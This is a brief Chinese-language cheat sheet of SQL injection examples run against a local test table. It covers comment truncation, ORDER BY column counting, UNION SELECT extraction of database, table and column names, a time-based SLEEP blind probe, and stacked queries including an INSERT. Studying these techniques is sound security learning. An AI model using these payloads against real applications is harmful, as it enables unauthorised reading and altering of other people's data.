SQL注入小案例

### 注入点 and 1=1 / and 1=2 注释符 -- 空格 后面的符号都会变成注释
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack'--+''

SELECT * FROM test WHERE id = 1 AND NAME = 'Jack' -- ORDER BY4

### 查询列数
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack' ORDER BY 2 -- '
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack' ORDER BY 4 -- '

 

###数据库名
SELECT * FROM test WHERE id = -1 AND NAME = 'Jack' UNION SELECT 1,(SELECT GROUP_CONCAT(DATABASE()))

####可以根据是否返回数据来判断 表的的字段数
SELECT * FROM test WHERE id = -1 AND NAME = 'Jack' UNION SELECT 1,2

###数据库所有表名
SELECT * FROM test WHERE id = -1 AND NAME = 'Jack' UNION SELECT 1,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,1)

###所有字段名
SELECT * FROM test WHERE id = -1 AND NAME = 'Jack' UNION SELECT 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE() LIMIT 0,1)

### 字段中的数据
SELECT * FROM test WHERE id = -1 AND NAME = 'Jack' UNION SELECT 1,(SELECT GROUP_CONCAT(NAME) FROM test LIMIT 0,1)

 

### 插入时间函数
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack' AND IF(ASCII(SUBSTR(DATABASE(),1,1))>25,SLEEP(3),1) -- '

###堆叠注入 原理就是支持多条sql语句同时执行

jdbc:mysql://localhost:3306/test?useUnicode=true&characterEncoding=utf-8&useSSL=true&serverTime=UTC&allowMultiQueries=true

SELECT * FROM test WHERE id = 1 AND NAME = 'Jack' ;SHOW TABLES;#-- '
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack';SHOW TABLES;-- '；

SELECT * FROM test WHERE id = 1 AND NAME = 'Jack'; INSERT INTO test VALUES (9,'nono2')

SELECT * FROM test WHERE id = 1 AND NAME = 'Jack';SELECT * FROM test WHERE id = 1;#-- '